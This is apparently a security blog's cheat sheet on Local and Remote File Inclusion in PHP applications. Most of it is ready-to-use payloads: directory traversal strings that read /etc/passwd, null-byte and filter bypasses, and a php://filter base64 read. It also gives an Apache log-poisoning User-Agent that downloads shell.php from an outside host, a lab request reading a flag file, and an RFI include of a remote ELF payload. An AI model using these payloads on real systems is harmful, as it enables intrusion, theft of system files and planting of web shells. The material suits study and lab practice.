← Back to Blog

Local File Inclusion & Remote File Inclusion

Type: Technical Notes Category: Web Exploitation
LFI RFI Web PHP Filter Bypass

Payload Box - LFI/RFI Payloads

LFI: Local File Inclusion

Local file inclusion is a vulnerability that can allow attackers to traverse the file system due to improperly or non-sanitized requests. This may allow an attacker to access sensitive files like /etc/passwd.

Common attack vector for LFI is /../../

get.php?file=../../../../etc/passwd

This allows traversal through layers of directories to the root or target folder. The number of ../ sequences depends on the specific system.

Triggering Errors to Discover Path

index.php?lang=jfbdsgd

index.php?page=2/../../../../../etc/passwd

This may return an error revealing the number of directories needed, or which function call is used (e.g., PHP's include()).

OS Detection:

/get.php?file=../../../../boot.ini

/get.php?file=../../../../windows/win.ini

Sanitization and Filter Evasion

NULL Byte Injection

In PHP 5.3.3 and below, NULL bytes can signify end of string and avoid extension filtering:

index.php?lang=../../../../etc/passwd%00

Empty Extension

For sites that auto-append .php, leaving extension blank can evade filtering:

&ext=

Stay in Directory

Using a '.' can signify staying within the directory:

../../../../etc/passwd/.

Forced Directory Bypass

If developer forces a directory, evasion may be as simple as adding extra navigation:

/../../../etc/passwd  -->  /../../../../etc/passwd

LFI - PHP Filters

/?view=php://filter/read=convert.base64-encode/resource=<path_object>/../../../../../../etc/passwd&ext=

The <path_object> may be whatever the ?view= contains (e.g., "bikes" for a blog).

Apache Log Poisoning

Apache log poisoning can be exploited via user-agent; PHP code inserted into the user agent can download malicious code:

User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://ip/shell.php'))?>

Using Burp Suite for Cookie-Based LFI

If _REQUEST is being used, take advantage of cookies:

POST /challenges////////////chall3.php HTTP/1.1
Host: 10.10.120.210
Cookie: =../../../etc/flag3
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

file=../../../etc/flag3%00

RFI: Remote File Inclusion

Requires allow_url_fopen to be enabled.

Overview: Payload hosted on attacker's server -> payload injected via HTTP requests using include function -> payload executed

GET /page.php?file=
lang=http://0.0.0.0/r.elf

Tools

  • lfimap
  • lfitester
  • vailyn